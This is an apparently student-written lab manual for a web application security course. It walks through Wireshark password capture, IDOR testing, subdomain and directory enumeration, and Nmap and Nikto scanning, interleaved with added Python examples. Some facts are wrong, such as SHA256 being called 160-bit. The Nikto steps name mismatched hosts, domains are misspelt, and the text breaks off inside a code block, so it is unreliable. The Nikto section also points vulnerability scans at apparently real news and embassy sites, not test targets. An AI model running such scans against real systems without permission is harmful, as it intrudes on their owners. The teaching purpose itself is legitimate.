P2 Practical

The document is a lab manual for the M.Sc. Cyber Security program at Narnarayan Shastri Institute of Technology, detailing various practical exercises in web application security. It includes a certificate of completion, an index of practicals, and step-by-step guides for analyzing HTTP traffic, ensuring data authenticity, exploring IDOR attacks, and using tools like Wireshark, HashCalc, and Nikto. Each practical aims to enhance students' understanding of web security vulnerabilities and techniques for securing applications.

Uploaded by

nfsunotess
Narnarayan Shastri Institute of Technology

Institute of Forensics Sciences and Cyber Security

M.Sc. Cyber Security


Semester - I (2024-25)

Lab Manual
Subject: Web Application Security Laboratory

Subject Code: CTMSCS SI L2

Name: Falak Prajapati


Enrolment No. : 240043001020
CERTIFICATE

THIS IS TO CERTIFY THAT Mr./Ms. _________________________________________WITH

ENROLLMENT NO._____________________________ OF M.Sc. CYBER SECURITY, SEMESTER:

_______ YEAR 2024/25 HAS SATISFACTORILY COMPLETED THE LAB PRACTICAL WORK IN

WEB APPLICATION SECURITY LABORATORY (SUBJECT CODE: CTMSCS SI L2)

PLACE:

DATE OF SUBMISSION:

SIGNATURE (FACULTY)                       SIGNATURE (PRINCIPAL)
INDEX

Sr. No.   Title   Page No.   Signature

1. Analyzing HTTP Traffic Using Wireshark. (p. 1)
2. Ensuring Data Authenticity: Calculating and Verifying Hash Values with HashCalc. (p. 5)
3. Exploring Common IDOR Attack. (p. 8)
4. Automated Subdomain Enumeration Using Sublist3r. (p. 12)
5. Analyzing Binary Files with a Hex Editor. (p. 16)
6. Network Discovery and Vulnerability Scanning with Nmap. (p. 20)
7. Web Application Security Scanning with Nikto. (p. 23)
8. Using Wappalyzer for Web Technology Fingerprinting. (p. 29)
9. Directory and Subdomain Enumeration Using Gobuster. (p. 32)
10. Web Application Directory and File Brute-Forcing with Dirbuster. (p. 34)
11. Web Application Security Testing with Burp Suite. (p. 38)
12. Session hijacking using cookie. (p. 42)
13. Enumeration techniques in Penetration testing. (p. 45)
14. Web Application scanning in Nessus. (p. 46)
15. Web application techniques using OWASP ZAP. (p. 49)
16. Techniques with Burp Suite. (p. 51)
17. Penetration DVWA - easy, medium, hard. (p. 55)
18. Develop remote shell application using MSFvenom. (p. 91)
Practical – 1. Analyzing HTTP Traffic Using Wireshark.
Aim: To analyze HTTP traffic using Wireshark in order to understand how the
HTTP protocol functions, including request and response flows, headers, and
data payloads. This analysis helps identify performance issues, troubleshoot
network problems, and enhance understanding of web communication.

Definition: Wireshark is a network protocol analyzer used to capture and inspect data packets traveling through a network. HTTP (Hypertext Transfer Protocol) is the foundational protocol for web communication. Analyzing HTTP traffic with Wireshark involves examining the interactions between clients and servers, such as HTTP requests (GET, POST, etc.), responses, and the associated headers and payloads.

Step 1: Download and install Wireshark from https://www.wireshark.org/download.html.

Step 2: Select the active network interface from the list of all interfaces shown.

Step 3: Open a test login page served over plain HTTP, so that a test password can be captured.

Step 4: Enter a username and password to log in to the vulnerable website.

Step 5: Apply a display filter on the request method, e.g.

http.request.method==POST

Step 6: Click on the matching packet line, then expand the last line of the packet details, which is "HTML Form URL Encoded".

Step 7: Finally, we achieve our aim: the username and password are visible in the form data.
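The same inspection as Steps 5 to 7, done in code so it can run over a capture export or a proxy log. This is an added example and not part of the lab manual: it keeps only POST requests (the display filter above), reads the URL-encoded form body and reports any field that looks like a login or password sent in the clear. The request text is a constructed sample; the host, path and field values are assumptions.

```python
"""Flag plaintext credentials in a captured HTTP POST.

Added example, not part of the lab manual: it does in code what Steps 5-7
do by hand in Wireshark (keep only POST requests, then read the URL-encoded
form body). The request below is a constructed sample; host, path and
field values are assumptions.
"""
from urllib.parse import parse_qs

# Constructed capture: what a plain-HTTP login looks like on the wire.
SAMPLE_REQUEST = (
    "POST /userinfo.php HTTP/1.1\r\n"
    "Host: testphp.example.test\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 25\r\n"
    "\r\n"
    "uname=test&pass=secret123"
)

# Form field names that usually carry a login or a secret (assumption).
CREDENTIAL_FIELDS = {"user", "username", "uname", "login", "email",
                     "pass", "password", "passwd", "pwd"}


def parse_http_request(raw: str) -> dict:
    """Split a raw HTTP/1.x request into method, path, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body}


def find_plaintext_credentials(raw: str) -> dict:
    """Return {field: value} for credential-like fields in a form-urlencoded POST.

    Equivalent to the display filter http.request.method==POST followed by a
    look at the "HTML Form URL Encoded" line; an empty dict means nothing to flag.
    """
    req = parse_http_request(raw)
    if req["method"] != "POST":
        return {}
    content_type = req["headers"].get("content-type", "")
    if not content_type.startswith("application/x-www-form-urlencoded"):
        return {}
    fields = parse_qs(req["body"], keep_blank_values=True)
    return {name: values[0] for name, values in fields.items()
            if name.lower() in CREDENTIAL_FIELDS}


if __name__ == "__main__":
    for field, value in find_plaintext_credentials(SAMPLE_REQUEST).items():
        print(f"{field} = {value}  (sent in the clear)")
```

Run it as a script to see the two flagged fields; the same function returns an empty dict for a GET or for a JSON body, which is why the conclusion below singles out unencrypted form logins.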

Conclusion:

To sum up, capturing passwords with Wireshark does work for unencrypted traffic, meaning HTTP, FTP, Telnet or even POP3. If you filter for the specific traffic and look into the packet details, this may reveal passwords in plaintext. On the other hand, passwords cannot be recovered from encrypted traffic like HTTPS unless we have access to the decryption keys. Monitoring network traffic must be done in compliance with applicable laws and regulations regarding privacy.
Practical – 2. Ensuring Data Authenticity: Calculating and Verifying Hash Values with HashCalc

Aim: To understand and demonstrate the use of HashCalc for calculating and
verifying hash values, ensuring data authenticity and integrity in digital files.
Definition: HashCalc is a utility tool used for generating hash values
(checksums) of files or text data using various algorithms (e.g., MD5, SHA-1,
SHA-256). Hash values are unique digital fingerprints that enable verification
of data integrity and authenticity by comparing calculated and provided hash
values.

Step 1: Install HashCalc, accepting all of the defaults. Once the installation routine completes, the following screen will appear.

Step 2: Select the file whose hash value you want to calculate.

Step 3: The left column of HashCalc lists all the hashing algorithms that the application supports. The options presented are:

1. MD5 represents 128-bit hashing algorithm
2. MD4 represents 128-bit hashing algorithm
3. SHA1 represents 160-bit hashing algorithm
4. SHA256 represents 160-bit hashing algorithm
5. SHA384 represents 384-bit hashing algorithm
6. SHA512 represents 512-bit hashing algorithm
7. RIPEMD160 represents 160-bit hashing algorithm
8. PANAMA represents 192-bit hashing algorithm
9. TIGER represents 160-bit hashing algorithm
10. MD2 represents 128-bit hashing algorithm
11. ADLER32 represents 32-bit hashing algorithm
12. CRC32 is not considered a forensic hashing algorithm.

Step 4: Select the algorithms one by one and click to continue. The output appears as follows.
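The same calculations with Python's standard library, as an added example that is not part of the lab manual or of HashCalc. It computes the digests HashCalc shows for the algorithms that hashlib guarantees, reports each digest's size in bits straight from the library (so the widths in the list above can be checked against the real values), adds the Adler-32 and CRC32 checksums, and verifies a file against a published digest with a constant-time comparison. The file content is a constructed sample.

```python
"""Calculate and verify hashes the way HashCalc does, with hashlib.

Added example (not the lab manual's or HashCalc's code): reproduces
Steps 2-4 in code and reports each digest size in bits.
"""
import hashlib
import hmac
import zlib

# Constructed sample content standing in for the file chosen in Step 2.
SAMPLE_DATA = b"lab manual sample file\n"

# Algorithms in HashCalc's list that every Python build provides.
ALGORITHMS = ["md5", "sha1", "sha256", "sha384", "sha512"]


def digest_table(data: bytes) -> dict:
    """Return {algorithm: (hex digest, digest size in bits)} for the data."""
    table = {}
    for name in ALGORITHMS:
        h = hashlib.new(name, data)
        table[name] = (h.hexdigest(), h.digest_size * 8)
    # HashCalc also lists these two; they are error-detection checksums,
    # not cryptographic hashes, so a tampered file can match by design.
    table["adler32"] = ("%08x" % zlib.adler32(data), 32)
    table["crc32"] = ("%08x" % zlib.crc32(data), 32)
    return table


def verify_hash(data: bytes, expected_hex: str, algorithm: str = "sha256") -> bool:
    """Compare a freshly computed digest with a published one.

    hmac.compare_digest runs in constant time, so the comparison does not
    leak how many leading characters matched.
    """
    actual = hashlib.new(algorithm, data).hexdigest()
    return hmac.compare_digest(actual.lower(), expected_hex.strip().lower())


def hash_file(path: str, algorithm: str = "sha256", chunk_size: int = 1 << 16) -> str:
    """Hash a file of any size without reading it fully into memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


if __name__ == "__main__":
    for name, (hexdigest, bits) in digest_table(SAMPLE_DATA).items():
        print(f"{name:8} {bits:4d} bits  {hexdigest}")
```

Use hash_file for real files (it streams), and verify_hash when a vendor publishes a checksum next to a download; a single flipped byte in the input changes the whole digest, which is what the tamper-detection claim in the conclusion rests on.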

Conclusion:
This practical shows you how to use Hash Calc to produce hash values that
can be used to confirm file integrity and test data authenticity. In
cybersecurity, hash functions are used to detect tampering and verify files.

Practical – 3. Exploring Common IDOR Attack Vectors: A Practical Guide Using IDOR Tool

Aim: The aim of this guide is to provide a practical understanding of common IDOR attack vectors and demonstrate the use of an IDOR tool for identifying and mitigating these vulnerabilities. By exploring real-world scenarios, this guide seeks to equip developers, testers, and security professionals with the skills to secure applications against unauthorized data access.
Definition:
Insecure Direct Object Reference (IDOR) is a type of vulnerability that occurs
when an application provides direct access to objects (such as files, database
records, or user information) without proper authorization. Attackers exploit
this flaw by manipulating input parameters (e.g., URLs, query strings, or API
requests) to access unauthorized data or resources.

Step 1: Log in to Altoro Mutual

Open your browser and navigate to http://altoro.testfire.net.
Log in using the demo credentials:
Username: admin
Password: admin

Step 2: Navigate to the Transaction History Page
After logging in, go to the "View Recent Transactions" page. Observe the URL in the browser when viewing the transactions.

Step 3: Identify the Vulnerable Parameter

Notice the parameter accountid=800000 in the URL. This parameter is likely controlling which account's transactions are displayed.

Step 4: Test for IDOR
Modify the accountid in the URL to a different value (e.g., accountid=800007) and press Enter. If you can view the transactions of another account without proper authorization, the application is vulnerable to IDOR.
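What the server is (and is not) doing behind the accountid parameter, as an added example that is not part of the lab manual or of Altoro Mutual. The first handler trusts the client-supplied account number outright, which is the IDOR; the second checks that the object belongs to the logged-in user and answers "missing" and "not yours" identically so the response does not confirm which account numbers exist. Account numbers, owners and transactions are constructed.

```python
"""Insecure direct object reference: vulnerable lookup beside the fixed one.

Added example (not the lab manual's or Altoro Mutual's code): an in-memory
model of the accountid parameter from Steps 3-4. All data is constructed.
"""

# Constructed data: which user owns which account.
ACCOUNTS = {
    800000: {"owner": "admin",
             "transactions": ["2024-01-05 -120.00 ATM", "2024-01-09 +2500.00 Salary"]},
    800007: {"owner": "jsmith",
             "transactions": ["2024-01-07 -35.50 Grocery"]},
}


class Forbidden(Exception):
    """Raised when a user asks for an object they are not authorised to see."""


def transactions_vulnerable(session_user: str, account_id: int) -> list:
    """The IDOR: the authenticated user is known but never consulted."""
    return ACCOUNTS[account_id]["transactions"]


def transactions_fixed(session_user: str, account_id: int) -> list:
    """Authorisation check: the object must belong to the authenticated user."""
    account = ACCOUNTS.get(account_id)
    if account is None or account["owner"] != session_user:
        # One error for both "no such account" and "not your account", so
        # the response cannot be used to enumerate valid account numbers.
        raise Forbidden(f"user {session_user!r} may not view account {account_id}")
    return account["transactions"]


def idor_check(session_user: str, other_account: int) -> dict:
    """Step 4 as a function: does asking for another accountid expose its data?"""
    result = {}
    for name, handler in (("vulnerable", transactions_vulnerable),
                          ("fixed", transactions_fixed)):
        try:
            handler(session_user, other_account)
            result[name] = "exposed"
        except Forbidden:
            result[name] = "denied"
    return result


if __name__ == "__main__":
    print(idor_check("admin", 800007))
```

The fix is a server-side ownership check on every object lookup; hiding or obfuscating the identifier (random IDs, encoding) only raises the guessing cost and is not a substitute.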

Conclusion:
IDOR vulnerabilities pose a significant security risk, as they allow attackers to
bypass authentication and access sensitive data. Understanding common attack
vectors and utilizing tools for detection are critical steps toward mitigating this
risk. By integrating secure coding practices, regular security assessments, and
IDOR testing tools into the development lifecycle, organizations can safeguard
their applications and protect user data effectively.

Practical – 4. Automated Subdomain Enumeration Using Sublist3r

Aim: The primary aims of automated subdomain enumeration using Sublist3r are to:
• Identify all subdomains associated with a target domain.
• Map the organization's digital footprint for security assessments.
• Discover exposed services or assets that could be vulnerable to attacks.
• Enhance reconnaissance efficiency by automating the subdomain discovery process.

Definition:
Automated Subdomain Enumeration Using Sublist3r involves using the
Sublist3r tool to identify and gather subdomains of a target domain. Sublist3r
leverages various online resources like search engines, DNS records, and APIs
to perform this task. It is commonly used in penetration testing and
reconnaissance to uncover potential attack vectors.

Step 1: Download and install. The Sublist3r source is on GitHub:
git clone https://github.com/aboul3la/Sublist3r.git

Step 2: Open a terminal or command prompt and run sudo su to become root.

Step 3: Clone the Sublist3r repository from GitHub by running the git clone command above.

Step 4: Navigate to the Sublist3r directory. After cloning, move into the Sublist3r folder by typing: cd Sublist3r

Step 5: Install the required Python libraries using the following command:
pip install -r requirements.txt

Step 6: Use Sublist3r for subdomain enumeration. Run the following command to find subdomains for a target website:
python sublist3r.py -d google.com
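The extraction step that Sublist3r automates, as an added example that is not Sublist3r's own code. Sublist3r fetches result pages from search engines and certificate and DNS sources and pulls hostnames out of them with a regular expression; this block does that over a constructed page and goes one step further than the manual's run by keeping only names that are really under the target domain, so a lookalike such as example.com.evil.test is not counted as an asset. The page text and domain are assumptions.

```python
"""Passive subdomain extraction, the core technique behind Sublist3r.

Added example (not Sublist3r's code): regex-extract hostnames from a
fetched page, normalise them and keep those in scope for the target domain.
The page snippet and the target domain are constructed.
"""
import re

# Constructed snippet standing in for a search-engine results page.
SAMPLE_PAGE = """
<a href="https://mail.example.com/login">Mail</a>
<a href="http://dev.api.example.com:8080/docs">Dev API</a>
<cite>www.example.com/about</cite>
<a href="https://example.com.evil.test/">lookalike</a>
<a href="https://MAIL.example.com/inbox">Mail again</a>
<a href="https://www.other.org/">unrelated</a>
"""

# One or more DNS labels followed by a letters-only top-level label.
HOSTNAME_RE = re.compile(
    r"(?i)\b((?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,})\b")


def in_scope(host: str, domain: str) -> bool:
    """True only for the domain itself or a name ending in '.' + domain."""
    host, domain = host.lower(), domain.lower()
    return host == domain or host.endswith("." + domain)


def extract_subdomains(page: str, domain: str) -> list:
    """Return sorted, de-duplicated in-scope hostnames found in the page.

    Lower-casing merges MAIL.example.com with mail.example.com, and the
    suffix check drops example.com.evil.test, which merely contains the name.
    """
    found = set()
    for host in HOSTNAME_RE.findall(page):
        if in_scope(host, domain):
            found.add(host.lower())
    return sorted(found)


if __name__ == "__main__":
    for host in extract_subdomains(SAMPLE_PAGE, "example.com"):
        print(host)
```

Names found this way still need resolving (a stale search index lists hosts that no longer exist), which is why Sublist3r's output is a starting list for inventory rather than a confirmed asset map.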

Conclusion:

Automated subdomain enumeration using Sublist3r is a critical step in reconnaissance during penetration testing or security assessments. Sublist3r simplifies the process of discovering subdomains by leveraging multiple sources, such as search engines, APIs, and DNS queries, to identify potential attack surfaces efficiently. By automating this task, security professionals can save time and uncover hidden subdomains that may contain vulnerabilities. This process strengthens overall security by enabling organizations to gain better visibility into their domain infrastructure and address potential risks proactively.

Practical – 5. Analyzing Binary Files with a Hex Editor

Aim: The aim of analyzing binary files with a hex editor is to:
• Understand the internal structure and data layout of binary files.
• Identify hidden information, metadata, or potential malicious code.
• Debug, repair, or modify binary files during software development or reverse engineering.
• Extract meaningful information for forensic investigations or malware analysis.

Definition: Analyzing Binary Files with a Hex Editor involves examining the
raw hexadecimal and binary content of a file using a hex editor. A hex editor
displays data in hexadecimal format alongside its ASCII representation,
allowing for in-depth inspection of a file's structure, metadata, and hidden
information. This process is widely used in fields like reverse engineering,
forensics, and debugging.
Step 1: Rename the selected file from the .exe extension to .pdf, so the apparent format changes.

Step 2: Install a hex editor, open it and load a sample file. Click File > Open in the hex editor and choose the file you want to analyse (for example a .txt file, a .jpg image or any other file). First save your changes, then open the modified file and look at the changes.

Step 3: Now you can see the different values, as shown below:

Step 4: In the first line you can see the value ... 4d 5a ...

Step 5: Open a browser and go to https://www.garykessler.net/, then search for 4d 5a.

Step 6: It shows that the file format is .EXE.

Step 7: Now change the extension back from .pdf to .exe.

Step 8: The file is as it was before.
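The check from Steps 3 to 6 in code, as an added example that is not part of the lab manual: a small hex-dump renderer in the hex editor's offset / hex / ASCII layout, a lookup of the leading bytes against a short signature table (the 4d 5a "MZ" header among them), and a comparison with the file extension so a renamed executable is reported whatever it is called. The sample bytes and the signature table are constructed and deliberately short.

```python
"""Hex dump and magic-number check: the manual part of Steps 3-8 in code.

Added example (not the lab manual's code): the signature table is a small
hand-picked subset, and the sample header bytes are constructed.
"""
import os

# Leading bytes ("magic numbers") of a few common formats. Constructed subset.
SIGNATURES = [
    (b"MZ", "exe"),                    # DOS/Windows executable: 4d 5a
    (b"%PDF-", "pdf"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpg"),
    (b"PK\x03\x04", "zip"),
    (b"\x7fELF", "elf"),
]

# Constructed: the first bytes of a Windows executable plus its DOS stub text.
SAMPLE_EXE_HEADER = (b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
                     b"This program cannot be run in DOS mode.")


def hexdump(data: bytes, width: int = 16) -> str:
    """Render bytes as offset, hex column and ASCII column, like a hex editor."""
    lines = []
    for offset in range(0, len(data), width):
        chunk = data[offset:offset + width]
        hex_part = " ".join(f"{b:02x}" for b in chunk)
        ascii_part = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{offset:08x}  {hex_part:<{width * 3}} {ascii_part}")
    return "\n".join(lines)


def detect_type(data: bytes) -> str:
    """Return the type implied by the magic number, or 'unknown'."""
    for magic, kind in SIGNATURES:
        if data.startswith(magic):
            return kind
    return "unknown"


def extension_matches_content(filename: str, data: bytes) -> bool:
    """False when the extension claims one format and the bytes say another.

    Files with no recognised signature (plain text, for instance) are not
    flagged, because there is nothing to contradict the extension.
    """
    ext = os.path.splitext(filename)[1].lstrip(".").lower()
    ext = {"jpeg": "jpg"}.get(ext, ext)
    detected = detect_type(data)
    return detected == "unknown" or detected == ext


if __name__ == "__main__":
    print(hexdump(SAMPLE_EXE_HEADER))
    for name in ("report.pdf", "tool.exe"):
        print(name, "matches content:", extension_matches_content(name, SAMPLE_EXE_HEADER))
```

A file's extension is only a hint to the operating system; mail gateways and upload handlers that rely on it alone are exactly what the rename in Step 1 defeats, so the content check belongs wherever a file's type decides how it is handled.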

Practical - 6. Network Discovery and Vulnerability Scanning with Nmap

Aim: The aim of network discovery and vulnerability scanning with Nmap is to:
• Detect active hosts and devices within a network.
• Identify open ports, running services, and their configurations.
• Uncover security vulnerabilities and misconfigurations.
• Enhance network security by providing actionable insights to mitigate risks.
• Support compliance efforts by ensuring the network security posture aligns with best practices.
Definition: Network Discovery and Vulnerability Scanning with Nmap refers
to the process of using Nmap (Network Mapper), an open-source network
scanning tool, to identify devices, services, and vulnerabilities within a network.
Nmap enables security professionals and administrators to gather details about
active hosts, open ports, and potential risks by performing scans and analyzing
network configurations.

Step 1: Open a terminal and enter nmap -h

Here -h shows the help menu of Nmap, providing an overview of its options and functionalities.

Step 2: Now, we will scan five websites by running this command:
sudo nmap -sS website_name
Here, the -sS option in Nmap performs a TCP SYN scan, which is one of the most popular and widely used scan techniques.
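What to do with the scan output once the SYN scan in Step 2 has run, as an added example that is not part of Nmap or of the lab manual: Nmap writes machine-readable XML with -oX, and this block parses that format and compares the open ports with a baseline of ports each host is supposed to expose, so a scan becomes a list of unexpected exposures rather than a wall of text. The XML document, addresses and baseline are constructed.

```python
"""Turn Nmap XML output (-oX) into a checklist against an approved-ports baseline.

Added example (not Nmap's or the lab manual's code): the XML below is a
constructed sample of the -oX format; host addresses and the baseline
are assumptions.
"""
import xml.etree.ElementTree as ET

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -oX scan.xml 192.0.2.10">
  <host>
    <status state="up"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
      <port protocol="tcp" portid="3306"><state state="open"/><service name="mysql"/></port>
      <port protocol="tcp" portid="443"><state state="closed"/><service name="https"/></port>
    </ports>
  </host>
</nmaprun>
"""

# Constructed baseline: the ports each host is expected to expose.
BASELINE = {"192.0.2.10": {22, 80, 443}}


def open_ports(xml_text: str) -> dict:
    """Return {address: {port: service name}} for every port in state 'open'."""
    root = ET.fromstring(xml_text)
    result = {}
    for host in root.iter("host"):
        addr_el = host.find("address")
        if addr_el is None:
            continue
        ports = {}
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            service = port.find("service")
            ports[int(port.get("portid"))] = service.get("name") if service is not None else "?"
        result[addr_el.get("addr")] = ports
    return result


def unexpected_ports(xml_text: str, baseline: dict) -> dict:
    """Per host: open ports not in the baseline, and baseline ports not seen open."""
    report = {}
    for addr, ports in open_ports(xml_text).items():
        allowed = baseline.get(addr, set())
        report[addr] = {
            "unexpected": {p: s for p, s in ports.items() if p not in allowed},
            "missing": sorted(allowed - set(ports)),
        }
    return report


if __name__ == "__main__":
    for addr, findings in unexpected_ports(SAMPLE_NMAP_XML, BASELINE).items():
        print(addr, findings)
```

Re-running the scan on a schedule and diffing against the baseline is the discovery half of the practical; a database port such as 3306 reachable from outside is the kind of finding the vulnerability-scanning half then investigates.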

Conclusion:
In this practical, we explored the capabilities of Nmap as a powerful tool
for network discovery and vulnerability scanning. By performing various
scans, including host discovery, port scanning, service detection, and
vulnerability assessment, we were able to identify active devices, open
ports, running services, and potential security weaknesses within a
network.

Practical - 7. Web Application Security Scanning with Nikto.

Aim: Nikto is an open-source scanner designed to detect vulnerabilities in web applications and servers. It performs scans to identify over 6,700 potentially risky files, outdated software, misconfigurations, and other security concerns. Primarily aimed at security professionals, Nikto provides a fast and efficient way to assess the security of web servers.
Definition: Web Application Security Scanning with Nikto involves using
Nikto, an open-source vulnerability scanner, to assess the security of web
servers and applications. Nikto scans for outdated software, misconfigurations,
common vulnerabilities, and potentially dangerous files or directories. It is a
vital tool in identifying weaknesses in web applications and servers.
Step 1: Open Nikto using this command: nikto

Step 2: Here we select https://www.thenews.com.pk to identify the vulnerabilities. Next we use the command "nikto -h https://www.thenews.com.pk -Tuning 2" to check for any misconfigurations in that website.

• -h : Specifies the host to scan (in this case, we use https://google-gruyere.appspot.com).
• -Tuning : Specifies which types of tests to perform during a scan. This allows users to customize the scan based on their specific interests or the vulnerabilities they want to investigate.

Step 3: Misconfiguration - focuses on identifying misconfigurations in the web server setup.

Step 4: Identify sensitive files and directories.

• To locate hidden or sensitive files and directories that may be exposed.

Step 1: Here we select "http://pakchanewdelhi.org.pk" to identify the vulnerabilities.
Step 5: Next we use the command "nikto -h http://pakchanewdelhi.org.pk -Tuning 1" to check for and identify sensitive files and directories.
• -h : Specifies the host to scan (in this case, we use http://localhost:3000/#/).
• -Tuning : Specifies which types of tests to perform during a scan. This allows users to customize the scan based on their specific interests or the vulnerabilities they want to investigate.

Step 6: Interesting File/Directory - looks for potentially interesting files or directories.

To identify potential information disclosure issues like server versions or error messages:
Step 7: Here we select "https://www.thenews.com.pk" to identify the vulnerabilities.
Step 8: Next we use the command "nikto -h www.thenews.com.pk -Tuning 3" to detect information disclosure.
• -h : Specifies the host to scan (in this case, we use https://www.thenews.com.pk).
• -Tuning : Specifies which types of tests to perform during a scan. This allows users to customize the scan based on their specific interests or the vulnerabilities they want to investigate.

Step 9: Injection - targets injection vulnerabilities, including SQL injection and command injection.

Practical 8: Using Wappalyzer for Web Technology Fingerprinting
Aim:
The aim of this practical is to familiarize participants with the process of
identifying and analyzing the technologies used by a website through web
technology fingerprinting. Specifically, the practical will focus on using
Wappalyzer, a powerful tool for detecting various technologies,
frameworks, and software components that power a website or
web application.

Step 1: Use the Wappalyzer browser extension. Chrome: install Wappalyzer from the Chrome Web Store.

Step 2: Add the Wappalyzer extension in Chrome.

Step 3: Wappalyzer has been installed successfully.

Step 4: Go to a particular website (e.g. flipkart.com) and then click on the Wappalyzer extension icon.
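How a fingerprint like the one Wappalyzer shows in Step 4 is derived from a response, and how the information-disclosure checks of Nikto's Tuning 3 in Practical 7 relate to it, in one added example that is neither Wappalyzer's nor Nikto's code. Wappalyzer matches response headers, meta tags and script paths against a rule set; this block applies a tiny hand-written subset of such rules to a constructed HTTP response, then runs the defender's view over the same headers: version banners that should be suppressed and security headers that are absent. The response text, rules and header list are assumptions.

```python
"""Fingerprint a web response (Wappalyzer-style) and flag disclosure (Nikto-style).

Added example (not Wappalyzer's or Nikto's code). The response is a
constructed sample and RULES is a small hand-written subset.
"""
import re

SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.29 (Ubuntu)\r\n"
    "X-Powered-By: PHP/7.2.24\r\n"
    "Set-Cookie: PHPSESSID=abc123; path=/\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    '<html><head><meta name="generator" content="WordPress 5.4">'
    '<script src="/wp-includes/js/jquery/jquery.js?ver=1.12.4"></script>'
    "</head><body></body></html>"
)

# (technology, where to look, regex whose first non-empty group is the version)
RULES = [
    ("Apache", "header:server", r"(?i)apache(?:/([\d.]+))?"),
    ("PHP", "header:x-powered-by", r"(?i)php(?:/([\d.]+))?"),
    ("PHP", "header:set-cookie", r"PHPSESSID="),
    ("WordPress", "html", r'<meta name="generator" content="WordPress ?([\d.]*)"'),
    ("jQuery", "html", r"jquery(?:[.-]([\d.]+))?(?:\.min)?\.js(?:\?ver=([\d.]+))?"),
]

# Headers a hardened site is expected to send (assumption; extend as needed).
SECURITY_HEADERS = ["strict-transport-security", "content-security-policy",
                    "x-content-type-options", "x-frame-options"]


def split_response(raw: str):
    """Return (status line, {header: [values]}, body) for a raw HTTP response."""
    head, _, body = raw.partition("\r\n\r\n")
    status, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers, body


def fingerprint(raw: str) -> dict:
    """Return {technology: version or ''} the way Wappalyzer's panel lists them."""
    _, headers, body = split_response(raw)
    found = {}
    for tech, where, pattern in RULES:
        targets = [body] if where == "html" else headers.get(where.split(":", 1)[1], [])
        for text in targets:
            match = re.search(pattern, text)
            if match:
                version = next((g for g in match.groups() if g), "")
                found[tech] = found.get(tech) or version   # keep a version once seen
    return found


def disclosure_findings(raw: str) -> list:
    """Nikto-style checks: version banners in headers and missing security headers."""
    _, headers, _ = split_response(raw)
    findings = []
    for name in ("server", "x-powered-by"):
        for value in headers.get(name, []):
            if re.search(r"\d+\.\d+", value):
                findings.append(f"{name} header discloses version: {value}")
    for name in SECURITY_HEADERS:
        if name not in headers:
            findings.append(f"missing security header: {name}")
    return findings


if __name__ == "__main__":
    print(fingerprint(SAMPLE_RESPONSE))
    for finding in disclosure_findings(SAMPLE_RESPONSE):
        print("-", finding)
```

The two functions read the same evidence from opposite sides: what lets a scanner name the stack and its exact versions is what the Server and X-Powered-By banners hand out for free, so the usual hardening is to strip versions from those headers and add the security headers the second check looks for.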

Conclusion:
Wappalyzer can be used for web technology fingerprinting, a technique
essential for security assessments, competitive analysis, and technology
stack optimization. While Wappalyzer is a powerful tool for detecting the
technologies behind a website, it is important to remember that it is only
a starting point for deeper analysis. For comprehensive security
assessments, Wappalyzer should be supplemented with additional
security tools and techniques to ensure a thorough evaluation of potential
vulnerabilities.

Practical 9: Directory and Subdomain Enumeration Using Gobuster
Aim:
The aim of this practical is to provide participants with a hands-on
experience in performing directory and subdomain enumeration using
Gobuster, a tool widely used in web application reconnaissance. The
practical will help participants understand how to identify hidden
directories, files, and subdomains that might not be easily discovered
through normal web browsing but could pose potential security risks.

Step 1: First, install Gobuster.

Step 2: Go to a particular website (e.g. https://altoromutual.com) to find hidden directories and files in it.
Practical 10: Web Application Directory and File Brute-Forcing with Dirbuster
Aim
The aim of this practical is to provide participants with hands-on experience in
performing directory and file brute-forcing attacks on web applications using
DirBuster, a widely used tool in web application penetration testing. This
process helps to identify hidden directories, files, and resources on a web server
that are not directly accessible through standard browsing, and could potentially
expose security vulnerabilities.

Step 1: Find Dirbuster under Web Application Analysis > Web Crawlers & Directory Bruteforce in the Linux application menu.

Step 2: After opening Dirbuster you will see a screen like this:

Step 3: Enter the target website (e.g. http://testphp.vulneb.com:80) and select its list info.

Step 4: After selecting list info you have to enter /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt in "File with list of dirs/files" and then click on the Start button.

Step 5: After clicking on the Start button you will see the scan information for this target website.

Conclusion:
In this practical, we demonstrated the use of Dirbuster to perform directory and
file brute-forcing on web applications. Dirbuster, with its GUI-based interface
and extensive wordlists, is an effective tool for discovering hidden directories,
files, and other resources on a target web server.
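The server-side view of the wordlist scans in Practicals 9 and 10, as an added example that is not part of Gobuster, Dirbuster or the lab manual. Both tools request thousands of guessed paths in quick succession, which leaves a burst of 404 and 403 responses from one client in the access log; this block parses combined-format log lines and raises an alert for any client that crosses a threshold of such responses inside a sliding time window. The log lines, threshold and window are constructed.

```python
"""Detect directory brute-forcing in web server access logs.

Added example (not Gobuster's, Dirbuster's or the lab manual's code):
counts 403/404 responses per client in a sliding window. The log lines
below are constructed in Apache/Nginx combined format.
"""
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Optional

SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2024:13:55:36 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"
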